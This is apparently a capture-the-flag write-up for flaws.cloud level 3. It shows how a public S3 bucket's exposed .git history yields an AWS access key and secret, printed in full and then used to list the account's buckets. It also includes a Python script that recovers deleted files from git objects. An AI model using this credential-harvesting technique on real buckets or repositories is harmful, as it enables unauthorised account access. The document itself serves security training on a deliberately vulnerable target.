Level 3 – Challenge statement:
The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are.
Background
flaws.cloud itself says it best:
Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS).
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.
A series of hints are provided that will teach you how to discover the info you'll need.
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level.
At the start of each level you'll learn how to avoid the problem the previous level exhibited.
Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud.
My approach:
“Similar” suggests another S3 bucket, this time perhaps one with AWS access and secret keys in it.
We know that the bucket name to start from is level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
Let’s first try public access, by browsing to: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
Works! There seem to be a bunch of files in there.
Let’s get a cleaner list by using the AWS CLI:
~$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --recursive
2017-09-17 23:12:24 52 .git/COMMIT_EDITMSG
2017-09-17 23:12:24 23 .git/HEAD
2017-09-17 23:12:24 130 .git/config
2017-09-17 23:12:24 73 .git/description
2017-09-17 23:12:24 452 .git/hooks/applypatch-msg.sample
2017-09-17 23:12:24 896 .git/hooks/commit-msg.sample
2017-09-17 23:12:24 189 .git/hooks/post-update.sample
2017-09-17 23:12:24 398 .git/hooks/pre-applypatch.sample
2017-09-17 23:12:24 1704 .git/hooks/pre-commit.sample
2017-09-17 23:12:24 4898 .git/hooks/pre-rebase.sample
2017-09-17 23:12:24 1239 .git/hooks/prepare-commit-msg.sample
2017-09-17 23:12:24 3611 .git/hooks/update.sample
2017-09-17 23:12:24 600 .git/index
2017-09-17 23:12:24 240 .git/info/exclude
2017-09-17 23:12:24 359 .git/logs/HEAD
2017-09-17 23:12:24 359 .git/logs/refs/heads/master
2017-09-17 23:12:24 679 .git/objects/0e/aa50ae75709eb4d25f07195dc74c7f3dca3e25
2017-09-17 23:12:24 770 .git/objects/2f/c08f72c2135bb3af7af5803abb77b3e240b6df
2017-09-17 23:12:25 820 .git/objects/53/23d77d2d914c89b220be9291439e3da9dada3c
2017-09-17 23:12:25 245 .git/objects/61/a5ff2913c522d4cf4397f2500201ce5a8e097b
2017-09-17 23:12:25 112013 .git/objects/76/e4934c9de40e36f09b4e5538236551529f723c
2017-09-17 23:12:25 560 .git/objects/92/d5a82ef553aae51d7a2f86ea0a5b1617fafa0c
2017-09-17 23:12:25 191 .git/objects/b6/4c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
2017-09-17 23:12:25 42 .git/objects/c2/aab7e03933a858d1765090928dca4013fe2526
2017-09-17 23:12:25 904 .git/objects/db/932236a95ebf8c8a7226432cf1880e4b4017f2
2017-09-17 23:12:25 98 .git/objects/e3/ae6dd991f0352cc307f82389d354c65f1874a2
2017-09-17 23:12:25 279 .git/objects/f2/a144957997f15729d4491f251c3615d508b16a
2017-09-17 23:12:25 125 .git/objects/f5/2ec03b227ea6094b04e43f475fb0126edb5a61
2017-09-17 23:12:25 41 .git/refs/heads/master
2017-02-27 08:14:33 123637 authenticated_users.png
2017-02-27 08:14:34 1552 hint1.html
2017-02-27 08:14:34 1426 hint2.html
2017-02-27 08:14:35 1247 hint3.html
2017-02-27 08:14:33 1035 hint4.html
2017-02-27 10:05:16 1703 index.html
2017-02-27 08:14:33 26 robots.txt
Two interesting bits here: authenticated_users.png and the .git directory contents. The latter is a complete git object store (loose objects under .git/objects, refs, logs), so the whole commit history is downloadable, not just the files currently checked out.
Let’s browse to have a look at the PNG first: http://s3-us-west-2.amazonaws.com/level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/authenticated_users.png
OK, that’s nothing useful, just an image for the level 3 documentation…
Now let’s poke around the .git directory…
Let’s make a local copy first:
$ aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud ~/testtest --recursive
.git/COMMIT_EDITMSG contains the message: “Oops, accidentally added something I shouldn’t have”, which likely means that a commit included AWS keys and a later commit tried to remove them…
Furthermore, if I run git log inside ~/testtest I get:
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:43 2017 -0600
Oops, accidentally added something I shouldn't have
commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:07 2017 -0600
first commit
This implies there is something in commit f52ec03b227ea6094b04e43f475fb0126edb5a61 that the developer didn’t want there, and removed it in commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526.
Deleting a file in a later commit does not remove it from the repository: the old commit, tree and blob objects are still under .git/objects (both commit hashes above appear in the bucket listing), so anything committed once is recoverable, and the only real fix for a leaked key is to revoke it.
Let’s have a closer look at commit f52ec03b227ea6094b04e43f475fb0126edb5a61 (still inside ~/testtest):
git checkout f52ec03b227ea6094b04e43f475fb0126edb5a61
Then let’s look at what file(s) have appeared:
~/testtest$ ls
access_keys.txt authenticated_users.png hint1.html hint2.html hint3.html hint4.html index.html robots.txt
Oops, there is access_keys.txt, let’s look:
~/testtest$ cat access_keys.txt
access_key AKIAJ366LIPB4IJKT7SA
secret_access_key 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
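The investigation above (COMMIT_EDITMSG, git log, checking out the earlier commit, cat access_keys.txt) relies on the git binary. The object store exposed by the bucket listing can also be read directly, which shows why the “removed” file is still there. The following is an added example written for this write-up, not code from the original post or from the flaws.cloud challenge: it builds a constructed two-commit .git directory in a temp folder (access_keys.txt added, then deleted, mirroring the history above), then walks the loose objects without git, lists every file a commit removed, and scans them for AWS access key IDs. The key ID inside is AWS’s documentation placeholder AKIAIOSFODNN7EXAMPLE, not the challenge’s key; the secret is a made-up string.

```python
"""Recover a 'deleted' file from the loose objects of a .git directory.
Constructed example for this write-up (not the post's or the challenge's code):
build_demo_repo() fakes the two-commit history above, access_keys.txt added then
removed, with the AWS docs placeholder key ID AKIAIOSFODNN7EXAMPLE. Loose
objects only (what the bucket listing exposes); packfiles are not parsed."""
import hashlib
import os
import re
import tempfile
import zlib

AKIA_RE = re.compile(rb"AKIA[0-9A-Z]{16}")  # shape of an AWS access key ID


def _write_object(git_dir, kind, payload):
    """Store a loose object as git does: zlib('<kind> <len>\\0' + payload)."""
    raw = b"%s %d\x00" % (kind.encode(), len(payload)) + payload
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def read_object(git_dir, sha):
    """Return (kind, payload) of the loose object with this hex SHA-1."""
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "rb") as f:
        header, payload = zlib.decompress(f.read()).split(b"\x00", 1)
    return header.split(b" ")[0].decode(), payload


def parse_tree(payload):
    """Flat tree -> {name: blob_sha}; entry = '<mode> <name>\\0' + 20 raw SHA bytes."""
    entries, i = {}, 0
    while i < len(payload):
        nul = payload.index(b"\x00", i)
        entries[payload[i:nul].split(b" ", 1)[1].decode()] = payload[nul + 1:nul + 21].hex()
        i = nul + 21
    return entries


def parse_commit(payload):
    """Return (tree_sha, first_parent_sha or None) from the commit headers."""
    tree = parent = None
    for line in payload.split(b"\n\n", 1)[0].split(b"\n"):
        key, _, value = line.partition(b" ")
        if key == b"tree":
            tree = value.decode()
        elif key == b"parent" and parent is None:
            parent = value.decode()
    return tree, parent


def deleted_files(git_dir):
    """Walk master along first parents and return (last_commit, path, content)
    for every file that a commit's parent has but the commit itself lacks."""
    with open(os.path.join(git_dir, "refs", "heads", "master")) as f:
        sha = f.read().strip()
    removed = []
    while True:
        tree, parent = parse_commit(read_object(git_dir, sha)[1])
        if parent is None:
            return removed
        ptree, _ = parse_commit(read_object(git_dir, parent)[1])
        child = parse_tree(read_object(git_dir, tree)[1])
        for name, blob in parse_tree(read_object(git_dir, ptree)[1]).items():
            if name not in child:  # gone from the working tree, still in objects/
                removed.append((parent, name, read_object(git_dir, blob)[1]))
        sha = parent


def find_aws_access_keys(git_dir):
    """[(path, key_id)] for every AWS key ID inside a deleted file."""
    return [(path, m.decode()) for _, path, content in deleted_files(git_dir)
            for m in AKIA_RE.findall(content)]


def build_demo_repo():
    """Constructed .git: commit 1 adds access_keys.txt, commit 2 removes it."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    os.makedirs(os.path.join(git_dir, "refs", "heads"))
    ident = (b"author dev <dev@example.invalid> 0 +0000\n"
             b"committer dev <dev@example.invalid> 0 +0000\n")
    index = _write_object(git_dir, "blob", b"<html>level3</html>\n")
    keys = _write_object(git_dir, "blob", b"access_key AKIAIOSFODNN7EXAMPLE\n"
                         b"secret_access_key not-a-real-secret\n")
    def tree(entries):  # git keeps tree entries sorted by name
        return _write_object(git_dir, "tree", b"".join(
            b"100644 " + n.encode() + b"\x00" + bytes.fromhex(s)
            for n, s in sorted(entries.items())))
    c1 = _write_object(git_dir, "commit", b"tree " + tree(
        {"index.html": index, "access_keys.txt": keys}).encode()
        + b"\n" + ident + b"\nfirst commit\n")
    c2 = _write_object(git_dir, "commit", b"tree " + tree({"index.html": index}).encode()
        + b"\nparent " + c1.encode() + b"\n" + ident
        + b"\nOops, accidentally added something I shouldn't have\n")
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as f:
        f.write(c2 + "\n")
    return git_dir


def demo():
    """Build the sample repo; return (deleted files, key IDs found in them)."""
    git_dir = build_demo_repo()
    return deleted_files(git_dir), find_aws_access_keys(git_dir)


if __name__ == "__main__":
    print(demo())
```

Pointing deleted_files() at the ~/testtest/.git copied from the bucket would walk the real history the same way. With git available, the equivalent of the checkout step without touching the working tree is git show f52ec03b227ea6094b04e43f475fb0126edb5a61:access_keys.txt, and git log --all --diff-filter=D --name-only lists every deleted path across the history.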
Let’s configure another AWS CLI profile using the newly discovered keys:
~/testtest$ aws configure --profile flawslevel3
AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]:
Now let’s see if they are valid, and if any interesting S3 buckets are available (aws sts get-caller-identity --profile flawslevel3 is the quickest validity check and also reports which account and IAM principal the key belongs to; listing buckets additionally tells us the key carries s3:ListAllMyBuckets):
$ aws s3 ls --profile flawslevel3
2017-02-19 03:41:52 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
2017-05-30 00:34:53 config-bucket-975426262029
2017-02-27 04:06:33 flaws-logs
2017-02-19 03:40:54 flaws.cloud
2017-02-24 13:15:42 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-27 02:29:03 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
2017-02-27 02:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
2017-02-27 03:49:03 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
2017-02-27 03:48:40 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
2017-02-27 04:07:13 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud
Indeed! There are the bucket names for level 2 through to the end.
Let’s try browsing to Level 4 publicly: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/
Level 4 unlocked.